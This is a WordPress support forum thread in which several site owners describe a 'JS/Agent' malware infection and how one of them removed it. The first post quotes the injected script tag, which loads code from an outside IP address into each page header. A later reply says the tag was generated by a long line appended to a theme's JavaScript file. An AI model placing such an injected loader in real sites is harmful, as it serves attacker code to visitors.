WordPress.org

Ready to get started?Download WordPress

Forums

"JS/Agent" warnings in AVG - nightmare hack in multiple WordPress sites (5 posts)

  1. boeellis
    Member
    Posted 3 years ago #

    Friends,

    I have multiple sites prompting the AVG warning "JS/Agent" This is most prominent in IE, less prominent in Chrome and non-existent in Safari and Firefox.

    Nonethless, the hack is there. Somewhere. I have been reading posts and threads and begging Dreamhost to help me for three straight days, nonstop...

    And yes, I am somewhat of a novice when it comes to php scripts, jquery scripts, and all that code (that's why I use WordPress!)... But I have made some progress... I have changed all ftp passwords, all user passwords and the "keys" in all of the wp-config files... I have upgraded all sites to 3.3.1 and updated or deleted most plugins, etc... All the recommended stuff... And while that might help things moving forward, the damage is already done... to at least six of my sites... probably more.

    It started six days ago when AVG Free began pegging one of our sites with the "JS/Agent" virus warning... It gave us a buch of file names in the Temporary Internet Folders with IE and in the Cache folders with Chrome... I downloaded the theme folder from one of the sites and AVG started pegging all of the .js files as infected...

    So, I began scouring all of my main *.php files for anything unusual and could not find anything. Then, I used Firebug on my home page and found a common denominator... All the sites have a script loading in the header section... in most cases right between two jquery lines.... I will attempt to place that code into this post with backticks now:

    The line above:
    <script type="text/javascript" src="http://allpropastors.org/wp-includes/js/jquery/jquery.js?ver=1.7.1"/>

    The hack line: <script id="dgllhguk" src="http://91.196.216.64/s.php?ref=&lc=http://allpropastors.org/&ua=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.7%20%28KHTML%2C%20like%20Gecko%29%20Chrome/16.0.912.75%20Safari/535.7"/>

    The line below:
    <script type="text/javascript" src="http://allpropastors.org/wp-content/themes/iCompany/lib/featured-images/js/jquery.cross-slide.js?ver=3.3.1"/>

    Now - I understand that I need to locate and remove that code, but I don't know how... In one instance, I found that hack between two lines that applied to a plugin and I was able to delete the plugin and therefore the code (though even after that the site still triggered an AVG warning in I.E. on the swfobect[2].js file... I have since recreated that site completely - which took 10 hours.... So you can see why I am hopeful that someone reading this post will help me, please... )

    Thanks so much... From Wake Forest, NC to your home or office. God bless.

    Sincerely,

    Boe

  2. lookhappy
    Member
    Posted 3 years ago #

    I've been having the same issue, and I recently implementing multiple additional security measures to try and stop things like this happeneing.

    I managed to track it down though - I believe it was being caused by Akismet. So I deleted and reinstalled that plugin and it seems better. Still looking for how this happened though. I'm afraid I'm not a code expert either

  3. thellwig
    Member
    Posted 3 years ago #

    I wonder if this is coincidental or not, but I'm in Rolesville, NC, yes, right next to Wake Forest, and I just had the same script show up in my WordPress site too.
    It's in the <head></head> tag surrounded on either side by other legitimate scripts.

    If anyone finds out where the problem is and how to fix it, I'll be much obliged!

    Timothy

  4. thellwig
    Member
    Posted 3 years ago #

    Ok, I actually solved it pretty quickly, but I still have no idea how my file got infected.

    For anyone else having this problem, here's how to fix it. Notice how the link to 91.196.216.64/s.php located between two other scripts? Open up the script that is referenced right before this one.
    For example, in Boe's situation, you would open up the jQuery script file. (In my case it was in the Tipsy script file.) Go all the way to the bottom of that file, and you'll see a line of code that looks like this: http://pastebin.com/XxxbPFUy (yes, it's a really long line. That was the code I found in mine).
    DELETE THAT LINE!

    Once you've done that, reload your site and the link in the header will be gone.

    So that's how to remove it, but I don't know how to keep it from coming back. Any insight into what caused this would be helpful.

  5. Bas
    Member
    Posted 3 years ago #

    I have exactly the same problem, Ive just been hacked for the fourth time and I cant find out the cause of this. Maybe its a good idea to post our plugins and theme here so we can compare them?

    My plugins:

    - Akismet
    - BackWPup
    - Google Analytics for WordPress
    - Google XML Sitemaps
    - Hello Dolly
    - SEO friendly images
    - TimThumb Vulnerability Scanner
    - Wordbooker
    - WordPress SEO
    - WP-SimpleViewer
    - WP Maintenance Mode

    My theme:

    Village from Theme Province

    I really hope we can solve this together, because its driving me crazy :p

Topic Closed

This topic has been closed to new replies.

About this Topic